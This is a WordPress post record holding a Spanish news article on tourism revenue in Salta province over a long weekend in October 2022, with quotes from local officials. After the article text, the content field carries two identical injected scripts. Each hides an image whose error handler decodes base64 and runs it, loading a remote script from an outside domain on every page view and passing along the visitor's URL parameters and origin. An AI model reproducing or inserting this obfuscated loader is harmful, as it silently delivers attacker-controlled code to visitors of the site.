{"id":1591,"date":"2022-10-11T10:56:41","date_gmt":"2022-10-11T13:56:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1591"},"modified":"2025-08-14T00:33:37","modified_gmt":"2025-08-14T03:33:37","slug":"el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extralargo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1591","title":{"rendered":"El turismo en Salta gener\u00f3 un impacto econ\u00f3mico de m\u00e1s de 800 millones durante el fin de semana extralargo"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#e60b42\"><em>26.478 turistas visitaron la provincia este fin de semana generando un impacto econ\u00f3mico de $849.452.940. Los destinos registraron tasas de ocupaci\u00f3n superiores al 90%.<\/em><\/h3>\n\n\n\n<p>De cara al inicio de la temporada de verano la provincia contin\u00faa consolid\u00e1ndose como uno de los destinos argentinos l\u00edderes. Esto se refleja en los niveles de ocupaci\u00f3n registrados durante el fin de semana extra largo en las diferentes regiones.<\/p>\n\n\n\n<p>De acuerdo a lo registrado por el Ministerio de Turismo y Deportes provincial, la cantidad de turistas que visitaron la provincia fue 26.478, los cuales generaron un impacto econ\u00f3mico total de $849.452.940.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4392-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235023.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4392-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235023.jpg\" alt=\"El turismo en Salta gener\u00f3 un impacto econ\u00f3mico de m\u00e1s de 800 millones durante el fin de semana extra largo\"\/><\/a><\/figure>\n\n\n\n<p>Por otra parte, el relevamiento indica que el promedio de ocupaci\u00f3n en toda la provincia fue de un 80% con un \u00edndice de pernocte promedio de 2,7 noches.<\/p>\n\n\n\n<p>Entre los destinos con un registro de ocupaci\u00f3n superior al 90% se destacan Cafayate, Cachi, Chicoana, Coronel Moldes y Ciudad de Salta.<\/p>\n\n\n\n<p><strong>Fernando Almeda<\/strong>, intendente de Cafayate, indic\u00f3 \u201chemos recibido a turistas de todo el pa\u00eds y tambi\u00e9n del extranjero, la verdad que Salta viene haciendo un trabajo espectacular junto a los 60 municipios y el sector privado para que el turismo siga creciendo en esta regi\u00f3n y en toda la provincia\u201d.<\/p>\n\n\n\n<p>A estos altos \u00edndices de ocupaci\u00f3n se le suman destinos como San Antonio de los Cobres, San Lorenzo, Molinos , Guachipas y San Carlos, los cuales registraron un 85 %.<\/p>\n\n\n\n<p><strong>Mario Pe\u00f1a,<\/strong>&nbsp;ministro de turismo y deportes, se\u00f1al\u00f3 \u201cSalta inicia el \u00faltimo trimestre del a\u00f1o siendo uno de los destinos nacionales m\u00e1s elegidos por los turistas, esto es resultado del trabajo en equipo que venimos llevando adelante con un sector privado que acompa\u00f1a la visi\u00f3n de crecimiento y liderazgo tur\u00edstico propuesta por el Gobernador S\u00e1enz\u201d.<\/p>\n\n\n\n<p>Con niveles de actividad que consolidan un a\u00f1o hist\u00f3rico para la actividad, inclusive comparado con registros previos a la pandemia, el sector privado destaca el movimiento econ\u00f3mico que el turismo est\u00e1 generando en la provincia.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4393-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235045.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4393-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235045.jpg\" alt=\"El turismo en Salta gener\u00f3 un impacto econ\u00f3mico de m\u00e1s de 800 millones durante el fin de semana extra largo\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4394-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235108.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4394-el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-20221010235108.jpg\" alt=\"El turismo en Salta gener\u00f3 un impacto econ\u00f3mico de m\u00e1s de 800 millones durante el fin de semana extra largo\"\/><\/a><\/figure>\n\n\n\n<p><strong>Gustavo Di Mecola<\/strong>, presidente de la C\u00e1mara de Turismo de Salta, manifest\u00f3 \u201cterminamos este feriado con excelentes resultados para toda la cadena de servicios tur\u00edsticos, esto nos marca que Salta sigue estando entre los primeros puestos al momento de elegir un destino por su variada oferta hotelera, gastron\u00f3mica y recreativa\u201d.<\/p>\n\n\n\n<p>Finalmente, Pe\u00f1a destac\u00f3 la gesti\u00f3n conjunta con el Ministerio de Turismo y Deportes de la Naci\u00f3n que encabeza Mat\u00edas Lammens. \u201cLa implementaci\u00f3n de las diferentes etapas del programa Pre Viaje han sido grandes impulsos para la actividad tur\u00edstica\u201d, concluy\u00f3.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-turismo-en-salta-genero-un-impacto-economico-de-mas-de-800-millones-durante-el-fin-de-semana-extra-largo-85389\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>26.478 turistas visitaron la provincia este fin de semana generando un impacto econ\u00f3mico de $849.452.940. Los destinos registraron tasas de ocupaci\u00f3n superiores al 90%. De cara al inicio de la temporada de verano la provincia contin\u00faa consolid\u00e1ndose como uno de los destinos argentinos l\u00edderes. Esto se refleja en los niveles de ocupaci\u00f3n registrados durante el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1592,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18,17],"tags":[],"class_list":{"0":"post-1591","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1591"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1591"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1591\/revisions"}],"predecessor-version":[{"id":7324,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1591\/revisions\/7324"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1592"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1591"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1591"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1591"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}